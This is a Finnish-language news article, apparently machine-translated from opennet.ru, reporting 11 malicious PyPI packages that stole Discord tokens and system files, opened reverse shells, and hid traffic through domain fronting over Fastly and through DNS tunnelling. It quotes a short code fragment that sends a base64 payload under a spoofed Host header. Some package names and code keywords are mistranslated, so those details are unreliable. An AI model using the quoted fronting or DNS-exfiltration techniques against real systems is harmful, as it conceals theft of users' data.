PyPI (Python Package Index) -hakemistosta tunnistettiin 11 haitallista koodia sisältävää pakettia. Ennen ongelmien havaitsemista paketteja oli ladattu yhteensä noin 38 tuhatta kertaa. Havaitut haittapaketit ovat tunnettuja siitä, että ne käyttävät kehittyneitä menetelmiä piilottaakseen viestintäkanavat hyökkääjien palvelimien kanssa.
- tärkeäpaketti (6305 latausta), tärkeä-paketti (12897) - loi yhteyden ulkoiseen palvelimeen varjolla muodostaen yhteyden pypi.python.org-sivustoon tarjotakseen shell-pääsyn järjestelmään (käänteinen kuori) ja käytti trevorc2-ohjelmaa piilottaakseen viestintäkanava.
- pptest (10001), ipboards (946) - käytti DNS:ää viestintäkanavana järjestelmän tietojen välittämiseen (ensimmäisessä paketissa isäntänimi, työhakemisto, sisäinen ja ulkoinen IP, toisessa - käyttäjänimi ja isäntänimi) .
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - tunnisti Discord-palvelutunnuksen järjestelmästä ja lähetti sen ulkoiselle isännälle.
- trrfab (287) - lähetti tunnisteen, isäntänimen ja tiedostojen /etc/passwd, /etc/hosts, /home sisällön ulkoiselle isännälle.
- 10Cent10 (490) - loi käänteisen kuoriyhteyden ulkoiseen isäntään.
- yandex-yt (4183) - näytti viestin järjestelmän vaarantumisesta ja ohjattiin sivulle, jossa on lisätietoja muista toimista nda.ya.ru:n (api.ya.cc) kautta.
Erityisen huomionarvoista on käyttää tärkeässä paketissa ja tärkeässä paketissa käytettyä ulkoisten isäntien käyttötapaa, jotka piilottivat toimintansa PyPI-hakemistossa käytetyllä Fastly-sisällönjakeluverkostolla. Itse asiassa pyynnöt lähetettiin pypi.python.org-palvelimelle (mukaan lukien nimen python.org määrittäminen SNI:ssä HTTPS-pyynnön sisällä), mutta HTTP "Host" -otsikko sisälsi hyökkääjien hallitseman palvelimen nimen (sek. forward.io. global.prod.fastly.net). Sisällönjakeluverkko lähetti vastaavan pyynnön hyökkäävälle palvelimelle käyttäen TLS-yhteyden parametreja pypi.python.org-osoitteeseen tiedonsiirrossa.
PyPI-infrastruktuuria käyttää Fastly-sisällönjakeluverkko, joka käyttää Varnishin läpinäkyvää välityspalvelinta tyypillisten pyyntöjen välimuistiin, ja käyttää myös TLS-varmenteiden käsittelyä CDN-tasolla loppupalvelimien sijaan HTTPS-pyyntöjen välittämiseen välityspalvelimen kautta. Kohdeisännästä riippumatta pyynnöt lähetetään välityspalvelimelle, joka määrittää halutun isännän HTTP "Host" -otsikon avulla, ja isäntäverkkotunnusten nimet on sidottu CDN-kuormituksen tasaajan IP-osoitteisiin, jotka ovat tyypillisiä kaikille Fastly-asiakkaille.
Hyökkääjien palvelin rekisteröityy myös CDN Fastlyyn, joka tarjoaa ilmaisia suunnitelmia kaikille ja mahdollistaa jopa anonyymin rekisteröinnin. On huomionarvoista, että pyyntöjen lähettämiseen uhrille "käänteisen kuoren" luomisen yhteydessä käytetään myös järjestelmää, mutta se aloitetaan hyökkääjän isännän puolelta. Ulkopuolelta vuorovaikutus hyökkääjien palvelimen kanssa näyttää lailliselta istuntolta PyPI-hakemiston kanssa, joka on salattu PyPI TLS -sertifikaatilla. Samanlaista tekniikkaa, joka tunnetaan nimellä "domain fronting", käytettiin aiemmin aktiivisesti isäntänimen piilottamiseen, kun esto ohitettiin, käyttämällä joissakin CDN-verkoissa tarjottua kykyä käyttää HTTPS-protokollaa osoittamalla kuvitteellinen isäntä SNI:ssä ja lähettämällä itse asiassa palvelimen nimen. pyydetty isäntä HTTP Host -otsikossa TLS-istunnon sisällä.
Haitallisen toiminnan piilottamiseksi TrevorC2-paketilla tehtiin lisäksi vuorovaikutus palvelimen kanssa tavallisen verkkonavigoinnin kaltaiseksi, esimerkiksi haitallisia pyyntöjä lähetettiin kuvan lataamisen varjolla ”https://pypi.python.org/images/ guid=” tietokoodauksella guid-parametrissa. url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = request.Request(url, headers = {'Isäntä': "psec.forward.io.global.prod.fastly.net"})
pptest- ja ipboards-paketit käyttivät erilaista lähestymistapaa verkkotoiminnan piilottamiseen, mikä perustui hyödyllisten tietojen koodaamiseen DNS-palvelimen kyselyissä. Haittaohjelma välittää tietoa suorittamalla DNS-pyyntöjä, kuten "nu4timjagq4fimbuhe.example.com", joissa ohjauspalvelimelle lähetettävät tiedot on koodattu base64-muodossa aliverkkotunnuksen nimessä. Hyökkääjä vastaanottaa nämä viestit ohjaamalla DNS-palvelinta example.com-toimialueelle.
Lähde: opennet.ru